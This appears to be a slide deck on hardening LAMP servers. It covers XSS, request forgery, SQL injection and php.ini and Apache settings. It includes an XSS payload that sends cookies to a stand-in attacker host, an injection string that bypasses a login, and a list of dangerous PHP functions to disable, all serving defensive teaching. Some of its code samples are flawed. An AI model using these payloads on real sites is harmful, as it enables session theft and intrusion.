  • 1. LAMP Security Practices XSS Request Forgeries SQL Injection Disable PHP, Apache, OS information Disable unnecessary modules Log PHP errors Disable/Limit file uploads DoS attack Remote Code execution Disable dangerous PHP functions Limit access to file system
  • 2. XSS A hacker posts the below given code snippet in the comment section of website http://exsite.com. Hello Everyone!<script>document.write("<img src="http://evilhacker.org/?" + document.cookie + "'>);</script> The code will load as it is whenever I will open the website http://exsite.com and will transfer my cookie data to hacker's site (http://evilhacker.org):- Note that cookie data may have my login credentials which you as a hacker can use to
  • 3. XSS solution All user submitted content should be filtered and all the disallowed characters should be removed In particular <, >, and all html tags should be stripped
  • 4. Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
  • 5. Request Forgeries Create, Update and Delete requests should be ensured to have originally generated from your application Ex. Dont use url like http://mysite.com/photos/delete/photo_id to delete a photo. Instead use a signature url valid for a predefined time. Check the below code:- $_SESSION['signature'] = md5(unique(rand(), true) + $username); $_SESSION['signature_timestamp'] = time() echo “<a href='http://mysite.com/photos/delete/photo_id?signature ={$_SESSION['signature']}'>”
  • 6. SQL Injection Ex. Input ' OR '1'='1 in userid field of login form. If server script for authentication uses “ Select * FROM tblusers WHERE userid = '$_GET['userid']' ”, this code will be interpolated to “ Select * FROM tblusers WHERE userid = '' OR '1'='1' ” which will result in valid records getting returned from database.
  • 7. SQL Injection Solution Use mysqli_real_escape_string($_GET['userid']) for all user supplied data Use prepared statements:- $statement = $connection->prepare( "SELECT * FROM tblusers WHERE userid = ?" ); $statement->bind_param( "i", $_GET['userid'] ); $statement->execute();
  • 8. Disable PHP information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.6 The output shows that the sites runs on PHP and the version of PHP as well Disable the information by setting expose_php=off in php.ini
  • 9. Disable Server Information Run the command : curl -I http://mysite.com/ HTTP/1.1 200 OK Date: Sat, 28 eApr 2012 09:48:55 GMT Server: Apache/2.2.20 (Ubuntu) The output shows Apache server, its version, and OS Ubuntu information Disable these information by setting ServerSignature Off ServerTokens Prod in /etc/apache2/conf.d/security file for Ubuntu or in httpd.conf file
  • 10. Disable unnecessary modules Use php -m to check list of enabled modules Disable modules like gd if not required On Ubuntu, goto folder /etc/php5/conf.d Run: sudo mv gd.{ini,disable} This will rename file gd.ini to gd.disable and then the gd module will not be loaded with php
  • 11. Log PHP errors Use following to hide PHP error messages to be diaplayed to site users display_errors = Off Use following to log the PHP error messages into a log file log_errors = On error_log = /var/log/httpd/php-error.log For realtime monitoring of php error log use:- tail -f /var/log/httpd/php-error.log
  • 12. Disable File Uploads If your site doesnt want file upload functionality, remove it from php.ini :- file_uploads = Off If your site wants file upload functionality, set it to only the required minimum value :- file_upload = On upload_max_size = 1M
  • 13. DoS attack To avoid script taking an infinite time and bringing down the server, use following settings:- max_execution_time = 30 max_input_time = 30 memory_limit = 40M
  • 14. Remote Code Execution Remote urls can be opened by PHP functions like fopen, file_get_contents, include, require These remote urls are many time causes of code injection and data leakage when not filtered by programmers carefully. To restrict remote file opening:- allow_url_fopen = Off allow_url_include = Off
  • 15. Disable Dangerous PHP functions Use following directive to disable the php functions that are very powerful, dangerous and not normally required when PHP is running with a web server :- disable_functions = exec, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
  • 16. Limit Access to File System Use following to restrict PHP's access to parts of file system:- open_basedir="/var/www/html/" The above will not allow PHP access to parts of file system like /etc or /tmp etc.
  • 17. Session file path Session files must be saved away from the web site folder. Use following to change session files location:- session.save_path="/var/lib/php/session" upload_tmp_dir="/var/lib/php/upload"
  • 18. Write protect conf and application files Use chattr +i command to write protect any file chattr +i /etc/php5/php.ini chattr +i /etc/mysql/my.cnf chattr +i /etc/apache2/apache2.conf chattr +i /var/www/html/ Such files then can not be modified even by root user. Use chattr -i command to revert back the write protection
  • 19. Refrences http://php.net/manual/en/security.php http://developer.yahoo.com/security http://www.phpfreaks.com/tutorial/php-security http://phpsec.org/php-security-guide.pdf http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html